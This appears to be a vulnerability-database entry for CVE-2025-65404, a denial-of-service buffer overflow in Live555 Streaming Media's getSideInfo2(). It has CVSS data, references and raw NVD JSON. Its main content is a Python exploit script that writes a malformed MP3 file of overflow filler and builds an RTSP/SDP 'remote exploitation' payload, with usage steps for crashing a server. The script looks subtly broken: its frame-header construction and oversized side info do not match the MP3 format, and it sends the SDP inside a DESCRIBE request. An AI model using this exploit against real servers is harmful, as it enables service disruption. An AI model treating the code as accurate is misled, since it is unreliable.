CVE-2025-65404

Description

A buffer overflow in the getSideInfo2() function of Live555 Streaming Media v2018.09.02 allows attackers to cause a Denial of Service (DoS) via a crafted MP3 stream.

CVSS Details

CVSS Score

6.5

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:a:live555:streaming_media:2018-09-02:*:*:*:*:*:*:* - VULNERABLE

Live555 Streaming Media v2018.09.02

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

#!/usr/bin/env python3
"""
CVE-2025-65404 PoC - Live555 getSideInfo2() Buffer Overflow
This PoC generates a malicious MP3 stream that triggers buffer overflow
in the getSideInfo2() function of Live555 Streaming Media v2018.09.02
"""
import struct
import sys

def create_malicious_mp3():
    """
    Create a malformed MP3 frame that triggers buffer overflow
    in getSideInfo2() function
    """
    # MP3 Frame Header (MPEG-1 Layer III)
    # Sync word (11 bits) + Version (2 bits) + Layer (2 bits) + Bitrate index + etc.
    frame_header = 0xFF  # Sync word start
    frame_header = (frame_header << 5) | 0x06  # MPEG-1, Layer III
    frame_header = (frame_header << 4) | 0x01  # Bitrate index (128 kbps)
    frame_header = (frame_header << 2) | 0x00  # Sample rate 44100 Hz
    frame_header = (frame_header << 1) | 0x00  # Padding bit
    frame_header = (frame_header << 1) | 0x00  # Private bit
    
    # Create malicious side information
    # The vulnerability exists in parsing this data
    # Inject oversized data to cause buffer overflow
    malicious_side_info = b'A' * 1000  # Overflow payload
    
    # Main audio data
    main_data = b'\x00' * 500
    
    # Construct the malformed frame
    mp3_frame = struct.pack('>I', frame_header)[1:4] + malicious_side_info + main_data
    
    return mp3_frame

def create_mp3_file(filename, num_frames=100):
    """
    Generate a malicious MP3 file with multiple frames
    """
    with open(filename, 'wb') as f:
        for i in range(num_frames):
            frame = create_malicious_mp3()
            f.write(frame)
    print(f"[+] Malicious MP3 file created: {filename}")
    print(f"[+] Total frames: {num_frames}")
    print(f"[+] File size: {num_frames * len(create_malicious_mp3())} bytes")

def create_rtsp_stream_payload():
    """
    Create RTSP stream payload for remote exploitation
    """
    rtsp_options = (
        "DESCRIBE rtsp://target-server/stream.mp3 RTSP/1.0\r\n"
        "CSeq: 1\r\n"
        "Accept: application/sdp\r\n"
        "\r\n"
    )
    
    malicious_sdp = (
        "v=0\r\n"
        "o=- 1234567890 1234567890 IN IP4 127.0.0.1\r\n"
        "s=Malicious Stream\r\n"
        "c=IN IP4 0.0.0.0\r\n"
        "t=0 0\r\n"
        "m=audio 0 RTP/AVP 14\r\n"
        "a=control:streamid=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA...\r\n"
    )
    
    return rtsp_options + malicious_sdp

if __name__ == "__main__":
    print("=" * 60)
    print("CVE-2025-65404 PoC - Live555 Buffer Overflow")
    print("=" * 60)
    
    # Generate malicious MP3 file
    create_mp3_file("malicious_stream.mp3", num_frames=50)
    
    # Generate RTSP payload
    print("\n[+] RTSP Payload for remote exploitation:")
    print(create_rtsp_stream_payload()[:200] + "...")
    
    print("\n[!] Usage:")
    print("[!] 1. Serve the malicious MP3 file via HTTP/RTSP")
    print("[!] 2. Wait for Live555 server to process the stream")
    print("[!] 3. The server should crash with buffer overflow")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-65404
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-65404
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-65404/
[4] VulDB https://vuldb.com/cve/CVE-2025-65404
[5] https://github.com/rgaufman/live555
[6] https://shimo.im/docs/16q8xMxpPlH8Z2q7

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-65404", "sourceIdentifier": "[email protected]", "published": "2025-12-01T16:15:57.170", "lastModified": "2025-12-23T13:51:18.637", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A buffer overflow in the getSideInfo2() function of Live555 Streaming Media v2018.09.02 allows attackers to cause a Denial of Service (DoS) via a crafted MP3 stream."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-120"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:live555:streaming_media:2018-09-02:*:*:*:*:*:*:*", "matchCriteriaId": "C9F01989-4E5A-42B7-8EF7-74E3A5335754"}]}]}], "references": [{"url": "https://github.com/rgaufman/live555", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://shimo.im/docs/16q8xMxpPlH8Z2q7", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}]}}